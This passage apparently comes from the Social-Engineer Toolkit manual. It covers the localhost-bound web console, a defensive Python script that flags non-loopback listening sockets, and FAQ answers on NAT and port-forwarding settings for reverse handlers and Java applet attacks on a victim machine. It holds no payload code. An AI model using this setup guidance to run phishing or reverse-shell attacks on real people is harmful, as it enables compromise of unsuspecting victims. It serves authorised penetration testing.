Once the SET Web Interface is running, browse to localhost:44444. SET will only listen on localhost; you will not be able to get to it remotely. The web interface should be pretty self-explanatory if you're familiar with the menu mode. One thing to note is that under the updates menu, you'll notice that you can dynamically edit the configuration options. When you save the new settings to the file, it will propagate different options in different menus. For example, if you set self-signed-applets to ON, new options will appear under the web attack menu. Otherwise, those options will remain hidden. To launch an attack, just click on one of the attack vectors, fill out the appropriate options and hit launch attack. Check the window that you launched the web interface from, and you should see the attack being launched.
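The manual notes that set-web binds to 127.0.0.1:44444 and so cannot be reached remotely, whereas the Metasploit handlers earlier in the walkthrough were bound to 0.0.0.0 and therefore listen on every interface. The following is an added example, not SET code, for checking which listeners on a host are exposed off-box: it parses lines in the layout of `ss -ltn` (constructed below, not captured output) and reports every LISTEN socket whose local address is not a loopback address.

```python
"""Report listening sockets reachable from other hosts.

Added example; not SET code. Input lines are constructed in the layout of
`ss -ltn` (State Recv-Q Send-Q Local Address:Port Peer Address:Port).
Any LISTEN entry not bound to a loopback address is returned, which is the
list to review before leaving a tool's handler or web console running.
"""
import ipaddress


def parse_local(field):
    """Split 'addr:port' as printed by ss, including '[::1]:44444' and '*:80'."""
    addr, port = field.rsplit(":", 1)
    addr = addr.strip("[]")
    if addr in ("*", ""):
        addr = "0.0.0.0"  # ss prints '*' for the unspecified address
    return addr, int(port)


def exposed_listeners(ss_lines):
    """Return (address, port) for every LISTEN line not bound to loopback."""
    exposed = []
    for line in ss_lines:
        parts = line.split()
        if len(parts) < 4 or parts[0] != "LISTEN":
            continue  # header line or a non-listening state
        addr, port = parse_local(parts[3])
        if not ipaddress.ip_address(addr).is_loopback:
            exposed.append((addr, port))
    return exposed


# Constructed sample: the set-web console on loopback (v4 and v6), a handler
# on all interfaces like the LHOST 0.0.0.0 example above, and sshd on [::].
SAMPLE_SS = [
    "State  Recv-Q Send-Q Local Address:Port   Peer Address:Port",
    "LISTEN 0      5      127.0.0.1:44444       0.0.0.0:*",
    "LISTEN 0      128    0.0.0.0:443           0.0.0.0:*",
    "LISTEN 0      128    [::]:22               [::]:*",
    "LISTEN 0      5      [::1]:44444           [::]:*",
]


def run_sample():
    return exposed_listeners(SAMPLE_SS)


if __name__ == "__main__":
    for addr, port in run_sample():
        print(f"exposed: {addr}:{port}")
```

Run it against real `ss -ltn` output on the SET host before and after a test: the console should never appear, and the handler on 443 should disappear as soon as the engagement step is over.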
In an effort to avoid confusion, the following covers some of the common questions asked about SET.

Q. I'm using NAT/Port forwarding, how can I configure SET to support this scenario?

A. Edit the config/set_config file and turn AUTO_DETECT=ON to AUTO_DETECT=OFF. Once this option is set, you will be prompted with the following questions:
NAT/Port Forwarding can be used in the cases where your SET machine is not externally exposed and may be a different IP address than your reverse listener.
Are you using NAT/Port Forwarding? yes or no: yes
Enter the IP address to your SET web server (external IP or hostname): externalipgoeshere

In some cases you may have your listener on a different IP address; if this is the case, the next question asks whether your IP address is different for the reverse handler/listener. If so, answer yes and enter the separate IP address for the listener.

Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address (yes or no): yes
Enter the IP address for the reverse handler (reverse payload): otherexternalipgoeshere
Q. My Java Applet isn't working correctly and I don't get prompted for the Applet when browsing the site.

A. You either do not have Java installed on the victim machine, or you're using a NAT/Port forwarding scenario and you need to turn AUTO_DETECT=ON to AUTO_DETECT=OFF. If you view the source of the webpage, the applet should be downloaded from your IP address that is accessible from the victim. In some cases SET may grab the wrong interface IP as well; in this scenario you will again want to edit the set_config and turn AUTO_DETECT to OFF.